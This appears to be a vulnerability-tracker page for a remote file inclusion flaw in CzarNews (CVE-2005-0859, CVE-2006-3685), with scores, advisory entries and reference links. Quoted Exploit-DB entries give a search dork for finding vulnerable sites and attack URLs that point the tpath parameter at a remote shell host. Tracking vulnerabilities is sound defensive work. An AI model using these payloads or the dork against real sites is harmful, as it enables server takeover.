CVE-2005-0859
Published 2005-05-02
Priority: P3 46, high
CVSS 2.0: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
EXPLOIT
EPSS: 11.40% (95.5th percentile)
PHP remote file inclusion vulnerability in CzarNews 1.13b allows remote attackers to execute arbitrary PHP code via the tpath parameter to (1) headlines.php or (2) news.php. NOTE: some sources have reported the "dir" parameter as being affected; however, this is likely a cut-and-paste error from the wrong section of the original vulnerability report. Also, the news.php version was later reported to be in 1.12 through 1.14.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| czaries_network | czarnews | — | — |
| czaries_network | czarnews | — | — |
| czaries_network | czarnews | — | — |
| czaries_network | czarnews | — | — |
GHSA
GHSA-cwv7-44mr-m539: PHP remote file inclusion vulnerability in CzarNews 1
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2006-3685 [HIGH] GHSA-cwv7-44mr-m539: PHP remote file inclusion vulnerability in CzarNews 1
PHP remote file inclusion vulnerability in CzarNews 1.12 through 1.14 allows remote attackers to execute arbitrary PHP code via a URL in the tpath parameter to cn_config.php. NOTE: the news.php vector is already covered by CVE-2005-0859.
GHSA
GHSA-3rw5-32q5-6f2x: PHP remote file inclusion vulnerability in CzarNews 1
ghsa_unreviewed·2022-05-01
CVE-2005-0859 [HIGH] GHSA-3rw5-32q5-6f2x: PHP remote file inclusion vulnerability in CzarNews 1
PHP remote file inclusion vulnerability in CzarNews 1.13b allows remote attackers to execute arbitrary PHP code via the tpath parameter to (1) headlines.php or (2) news.php. NOTE: some sources have reported the "dir" parameter as being affected; however, this is likely a cut-and-paste error from the wrong section of the original vulnerability report. Also, the news.php version was later reported to be in 1.12 through 1.14.
No detection rules found.
Exploit-DB
CzarNews 1.14 - 'tpath' Remote File Inclusion
exploitdb·2006-07-13
CVE-2006-3685 CzarNews 1.14 - 'tpath' Remote File Inclusion
---
CzarNews <= (tpath) Remote File Inclusion Exploit
Critical Level : Dangerous
Dork : "CzarNews v1.12 " | "CzarNews v1.13" | "CzarNews v1.14 "
http://sitename.com/news.php?tpath=http://SHELLURL.COM?
http://sitename.com/cn_config.php?tpath=http://SHELLURL.COM?
Discovered By : SHiKaA
Contact : SHiKaA-[at]hotmail.com
GreetZ : Semsemmasr Black_Scorpion Medo_Ye7ya Kambaa NANA METO7575 Gendiaaa Saw SnIpEr_Sa Masry OSA FEGLA 3amer
# milw0rm.com [2006-07-13]
Exploit-DB
CzarNews 1.13/1.14 - 'headlines.php' Remote File Inclusion
exploitdb·2005-03-21
CVE-2005-0859 CzarNews 1.13/1.14 - 'headlines.php' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/12857/info
CzarNews is prone to a remote file-include vulnerability.
An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
CzarNews 1.13b is reported vulnerable; other versions may be affected as well.
http://www.example.com/research/news/CzarNewsv113b/headlines.php?tpath=http://www.example.org/cn_config.php
No writeups or analysis indexed.
http://secunia.com/advisories/14670
http://securitytracker.com/id?1013486
http://www.osvdb.org/14925
http://www.osvdb.org/14926
http://www.securityfocus.com/bid/12857
http://www.securityfocus.com/bid/18411
https://exchange.xforce.ibmcloud.com/vulnerabilities/19765
https://exchange.xforce.ibmcloud.com/vulnerabilities/27733
https://www.exploit-db.com/exploits/2009